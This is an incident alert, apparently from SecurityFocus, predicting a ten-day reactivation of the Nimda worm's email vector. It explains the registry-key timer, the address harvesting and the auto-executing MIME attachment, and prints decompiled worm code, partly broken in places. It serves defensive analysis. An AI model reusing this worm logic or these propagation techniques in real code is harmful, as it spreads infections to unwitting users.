Nimda Reactivation Alert
Analysts:
Oliver Friedrichs, Elias Levy, Andrew Mackie,
Jensenne Roculan, Ryan Russell, and Mario Van Velzen
Incident Analysis Alert
Version 1
Executive Summary
The ARIS analyst team believes that some functionality of the Nimda worm may become active again beginning on the evening of September 27 in North America. Analysis of functions present within the worm have exposed program code that cause portions of the worm to reactivate in ten-day cycles. At the end of the ten-day cycle that begins with the initial infection of a host by the Nimda worm, the email infection vector is triggered, and the worm again attempts to propagate using email.
A number of factors diminish the Nimda worm’s reactivation. The primary factor is that the worm must still be active in the wild, enabling it to reactivate at the end of the ten-day cycle. We believe that this is currently the case.
A second factor is that other portions of the worm do not lie dormant during this time. All other infection vectors appear to continue to operate normally during this period. It is unlikely that the presence of the worm can be overlooked on an infected system, due to the other infection vectors being active.
The release of antivirus software updates by most leading antivirus vendors also diminishes the impact of the second wave of propagation attempts.
Due to these factors, we believe that this second wave of Nimda worm activity will be less significant than the original, but because a second wave is still possible, we recommend corrective action.
Action Items
! Apply the appropriate patches supplied by Microsoft.
! Check for DAT updates from the appropriate antivirus vendor to update antivirus software so your system can detect instances of this worm.
! Configure appropriate security permissions on network shares.
! Follow the steps and measures outlined in the original Nimda worm analysis available at
Associated Vulnerability: Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Microsoft Office 2000 DLL Execution Vulnerability Associated Bugtraq ID: 1806, 2524, 2708, 1699
Urgency: High Ease of Exploit: Automatic
Associated Operating Systems: Microsoft Windows 95, 98, ME, NT, 2000
Technical Overview
The email propagation vector in the Nimda worm performs a series of operations causing it to reactivate ten days after its initial infection. Since the initial infection began as early as 3:00 a.m. GMT on
September 18, we believe that a second wave of Nimda worm infections will begin to start as early as Friday, September 28, or on the evening of Thursday, September 27 in North America.
Upon initial infection, the Nimda worm checks for the existence of the following registry key: HKCR\Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail\Cache
If this registry key does not exist, it is created and a numerical value representing the current year, month, and day is stored in this key, and the email infection vector is executed. Upon future executions of the worm, the value of this key is checked, and the email infection vector executes only if the current date is ten days past the stored value. The worm then updates this key’s value to enable further
execution in ten-day increments.
The worm sends itself in a specially crafted email containing an “audio/x-wav” MIME attachment. This attachment is automatically executed if viewed in the preview pane of Outlook or Outlook Express, where Internet Explorer is vulnerable to the MIME Header Attachment Execution vulnerability. The attachment is an executable called “readme.exe.” Outlook and Outlook Express are vulnerable because they use Internet Explorer components to view HTML messages.
Nimda uses several techniques to increase the effectiveness of its email propagation. First, it generates a list of email addresses from the Internet Explorer browser cache and the default MAPI mailbox (which is usually the Inbox for Outlook or Outlook Express). It also caches the subject of the messages found in the MAPI mailbox. It then uses one address at random to be the source of the emails it sends. Nimda also includes its own SMTP client, which contacts the appropriate mail servers for the various targets. Because of the choice of email addresses harvesting, Nimda often generates invalid addresses. When the email bounces at the remote server, the person used as the sending (in the “From:” field) in the email address receives a message indicating that the email containing the virus was bounced. This behavior often led people to incorrectly assume that they were infected, and will likely continue to do so.
The Nimda worm contains a bug in the code that collects email subject lines. It appears that, in some cases, the MAPI call returns a long “sampledesktopsampledesktop . . .” subject line that causes the buffer overflow. This results in long or bizarre subject lines, and could also potentially result in access violations, killing the worm.
Source Code Analysis
The following is an analysis of the Nimda worm source code that led to the release of this alert. The proceeding source code implements the ten-day cycle.
/* Procedure: 0x3617548D - 0x3617558A */ EmailVector()
{
SySTEMTIME st; /* unknown void Vffffffd8; WORD SystemTime.wYear */
/* unknown void Vffffffda; WORD SystemTime.wMonth */ /* unknown void Vffffffde; WORD SystemTime.wDay */
WORD saved_days; /* unknown void Vffffffe8; */
DWORD dwDisposition; /* unknown void Vffffffec; */
WORD modified; /* unknown void Vfffffff0; */
WORD days; /* unknown void Vfffffff4; */
unsigned long len; /* unsigned long Vfffffff8; */
HKEY hKey; /* long Vfffffffc */
modified = 0;
GetSystemTime( & st );
days = (st.wYear * 365) + (st.wMonth * 30) + st.wDay; len = 4;
/* Open the registry key. Create it if necessary */ /* -2147483647 == &H80000001 == HKEY_CURRENT_USER */
/* 983103 == KEY_ALL_ACCESS | 0 == REG_OPTION_NON_VOLATILE */ if (RegCreateKeyExA( HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, & hKey, & dwDisposition ) == 0)
{
/* REG_OPENED_EXISTING_KEY == 2 */
if(dwDisposition != REG_OPENED_EXISTING_KEY) {
/* If the key did not exist add the Cache sub-key */ /* REG_DWORD == 4, ERROR_SUCCESS == 0 */
if (RegSetValueExA(hKey, "Cache", 0, REG_DWORD, &days, len)
== ERROR_SUCCESS)
{
modified = 1;
} } else {
/* if the key existed read the value of the sub-key */ /* REG_NONE == 0 */
== ERROR_SUCCESS) {
/* if we could read the sub-key, if more than then days passed since it was last set update it with the new trigger date */
if ( saved_days + 10 < days ) {
RegSetValueExA(hKey, "Cache", 0, REG_DWORD, &days, len); modified = 1;
}
} else {
/* if we could not read the sub-key set it to the trigger date */
RegSetValueExA(hKey, "Cache", 0, REG_DWORD, & days, len); } } RegCloseKey(hKey); } *L3617D664 = 0; if (modified) { DoEmailVector(); } return(1); } /* L3617558B() */ DoEmailVector() {
char buff[1024]; /* unknown */ void Vfffffbf8; DWORD len; /* unknown */ void Vfffffff8; HKEY hKey; /* unknown void Vfffffffc; */ /* -2147483647 == &H80000001 == HKEY_CURRENT_USER */ /* 983103 == KEY_ALL_ACCESS | ERROR_SUCCESS == 0 */ if (RegOpenKeyExA( HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS ) {
/* Lookup the Temporary Internet Files folder */
RegQueryValueExA(hKey, "Cache", 0, REG_NONE, &buffer, &len);
RegCloseKey(hKey); GetEmailAddressFromWebCache(buff); } GetEmailAddressFromMAPI(); SendEmail(); return 1; }
Attack Data
Figure 1 depicts the dramatic rise in attack activity triggered by Nimda beginning at 03:00 GMT on September 18. This data, when combined with the ten-day cycle, leads to the prediction that
propagation via the email infection vector will resume beginning at 03:00 GMT on September 28, or the evening of September 27 in North America.
Attacks % Users # Attacks
Generic "../" Directory Traversal Attack 27.93 480866 Microsoft IIS/PWS Escaped Characters Decoding Command
Execution Attack 24.32 201671
Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal
Attack 17.12
125537 Microsoft IIS 4.0/5.0 File Permission Canonicalization Attack 11.71 29126 Generic HTTP Directory Traversal Attack 9.91 22760
Glossary
If you are unfamiliar with any term used in this report, please visit the SecurityFocus glossary at
http://www.securityfocus.com/glossary/index.html for more details on information security terminology.
Contact Information
Corporate Headquarters
SecurityFocus
1660 S. Amphlett Blvd., Suite 128 San Mateo, CA 94402 USA
650-655-6300 (tel) 650-655-2099 (fax)
Canadian Office
100-4th Avenue S.W., Suite 710 Calgary, AB, T2P 3N2 Canada 403-213-3939 (tel)
403-233-9179 (fax)
The ARIS predictor service provides Incident Alert and Analysis Reports, as well as Weekly and Monthly Summary Reports. These reports draw on IDS log data contributed to the SecurityFocus Incidents Database by ARIS analyzer members. Members submit this log data to the Incidents Database voluntarily and often anonymously. While SecurityFocus experts make every effort to inspect this data for validity, SecurityFocus does not guarantee the accuracy of submitted data. SecurityFocus uses the aggregated log information to detect trends and provides it to customers AS IS. Should you have questions, please contact [email protected].
